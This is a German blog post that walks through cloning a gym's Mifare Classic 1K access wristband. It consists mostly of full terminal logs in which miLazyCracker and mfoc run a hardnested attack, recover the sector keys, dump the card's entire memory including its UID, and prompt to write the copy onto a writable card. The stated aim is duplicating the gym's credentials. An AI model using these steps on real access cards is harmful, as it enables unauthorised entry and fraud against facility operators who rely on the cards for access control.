Fitnessstudio Armband – Reverse Engineering

Ziel: Duplizieren von Fitnessstudioarmbändern (Mifare Classic 1K)

Link to part two

Erste Ansätze

Um die Armbänder zu duplizieren benötigt man zuerst einmal Informationen über den Chip.

NFC Tools Android App

https://play.google.com/store/apps/details?id=com.wakdev.wdnfc&hl=de

Diese App zeigt folgenden erkannten Chiptyp an:

-> Typ: ISO 14443-3A

-> MifareClassic

Nachdem wir wissen, dass es MIFARE Chips sind können wir ja auch mal die offizielle App verwenden:

https://play.google.com/store/apps/details?id=de.syss.MifareClassicTool&hl=de

MIFARE Classic Tool – MCT

-> UID

-> RF Technology – ISO/IEC 14443, Type A

-> Memory Size – 1024 byte

-> Block Size – 16 byte

Aktueller Stand

Warten auf Lieferung des ACR122U plus den Karten mit beschreibbarem Block 0 (diese gibt es natürlich nicht bei Amazon)

ACS ACR122U USB 2.0 weiß Chipkartenleser - Chipkartenleser (USB 2.0, 65 x 12,8 x 98 mm, 70 g, Windows 2000, Windows 2000 Professional, Windows 7 Home Basic, Windows 7 Home Basic x64, Windows 7..., Android, ISO 14443, CE, FCC C, KC, VCCC. I, PC/SC, CCID, USB)
ACS ACR122U USB 2.0 weiß Chipkartenleser - Chipkartenleser (USB 2.0, 65 x 12,8 x 98 mm, 70 g, Windows 2000, Windows 2000 Professional, Windows 7 Home Basic, Windows 7 Home Basic x64, Windows 7..., Android, ISO 14443, CE, FCC C, KC, VCCC. I, PC/SC, CCID, USB)
von ACS
  • Unterstützt neue Ultralight C (über Pseudo-APDUs) und Plus SL1 (4 Byte UID, über Pseudo APDUS) und SL3
  • Unterstützt ISO 14443 Typ A und B, FeliCa, und alle 4 Arten von NFC (ISO/IEC 18092) Tags
  • Lese-/Schreibgeschwindigkeit bis zu 424 kbps
  • CCID-konform PC/SC-konform
  • International products have separate terms, are sold from abroad and may differ from local products, including fit, age ratings, and language of product, labeling or instructions.
Unverb. Preisempf.: € 57,26 Du sparst: € 2,16 (-4%)  Preis: € 55,10 Auf Amazon ansehen
Preis inkl. MwSt., zzgl. Versandkosten

Software: https://github.com/ilumitr/miLazyCracker

Dazugehörige Videoanleitung

miLazyCracker - Kevin Larson

Fazit: Die mitgelieferte Software und mfcuk wollten beide nicht so wie ich.

Mit miLazyCracker hat es letztendlich geklappt.

Die Daten liegen verschlüsselt vor und deswegen muss erst ein passender Key zur Entschlüsselung gefunden werden.

Wenn dies geschehen ist kann man die Originaldaten als Dump speichern.

Execute miLazyCracker

Mathiass-MBP:dump mathias$ miLazyCracker
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [xxxx...........x]
[Key: a0a1a2a3a4a5] -> [xxxx...........x]
[Key: d3f7d3f7d3f7] -> [xxxx...........x]
[Key: 000000000000] -> [xxxx...........x]
[Key: b0b1b2b3b4b5] -> [xxxx...........x]
[Key: 4d3a99c351dd] -> [xxxx...........x]
[Key: 1a982c7e459a] -> [xxxx...........x]
[Key: aabbccddeeff] -> [xxxx...........x]
[Key: 714c5c886e97] -> [xxxx...........x]
[Key: 587ee5f9350f] -> [xxxx...........x]
[Key: a0478cc39091] -> [xxxx...........x]
[Key: 533cb6c723f6] -> [xxxx...........x]
[Key: 8fd0a4f256e9] -> [xxxx...........x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Unknown Key A Unknown Key B
Sector 05 - Unknown Key A Unknown Key B
Sector 06 - Unknown Key A Unknown Key B
Sector 07 - Unknown Key A Unknown Key B
Sector 08 - Unknown Key A Unknown Key B
Sector 09 - Unknown Key A Unknown Key B
Sector 10 - Unknown Key A Unknown Key B
Sector 11 - Unknown Key A Unknown Key B
Sector 12 - Unknown Key A Unknown Key B
Sector 13 - Unknown Key A Unknown Key B
Sector 14 - Unknown Key A Unknown Key B
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff


Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
MFOC not possible, detected hardened Mifare Classic
Trying HardNested Attack...
libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt
Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
Collected 1775 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase
Collected 1785 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase...
Starting 8 threads to test 1186294334976 states using 256-way bitslicing
Cracking... 48.56%
Found key: 81cc25ebbb6a
Tested 576573835694 states
81cc25ebbb6a
mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
The custom key 0x81cc25ebbb6a has been added to the default keys
No NFC device found.


Mathiass-MBP:dump mathias$ mfoc -O dump.dmp -k 81cc25ebbb6a
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
[Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x]
[Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x]
[Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x]
[Key: 000000000000] -> [xxxx\\\\\\\\\\\x]
[Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x]
[Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x]
[Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x]
[Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x]
[Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x]
[Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x]
[Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x]
[Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x]
[Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff


Using sector 00 as an exploit sector
Card is not vulnerable to nested attack


Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
MFOC not possible, detected hardened Mifare Classic
Trying HardNested Attack...
libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt
Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
Collected 1283 nonces... leftover complexity 1922805806080 (~2^40.81) - press enter to start brute-force phase
Collected 1293 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase...
Starting 8 threads to test 1922805806080 states using 256-way bitslicing
Cracking... 78.71%
Found key: 3e65e4fb65b3
Tested 1513544667086 states
81cc25ebbb6a
3e65e4fb65b3
mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
The custom key 0x81cc25ebbb6a has been added to the default keys
The custom key 0x3e65e4fb65b3 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
 ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
 UID (NFCID1): 04 e8 f9 c2 a5 59 80
 SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
[Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]

Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff

We have all sectors encrypted with the default keys..

Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 48, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 47, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 46, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 45, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 44, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 43, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 42, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 41, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 40, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 39, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 38, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 37, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 36, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 35, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 34, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 33, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 32, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 31, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 30, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 29, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 28, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 27, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 26, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 25, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 24, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 23, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 22, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 21, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 80
Block 20, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 00 00 00 80
Block 19, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 18, type A, key 3e65e4fb65b3 :60 ca 46 c8 a7 6b f2 8a d4 3f 28 b3 92 e2 2f 66
Block 17, type A, key 3e65e4fb65b3 :00 59 32 8a 59 d0 4e a6 00 2a 80 09 00 00 00 23
Block 16, type A, key 3e65e4fb65b3 :10 00 40 83 00 00 00 53 00 00 00 00 59 d2 ff f4
Block 15, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 14, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 13, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 12, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 11, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 10, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00


Dump left in: mfc_04e8f9c2a55980_dump.mfd
Do you want clone the card? Place card on reader now and press Y [y/n] y
Die Anzeige der Produkte wurde mit dem affiliate-toolkit Plugin umgesetzt.

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Nach oben scrollen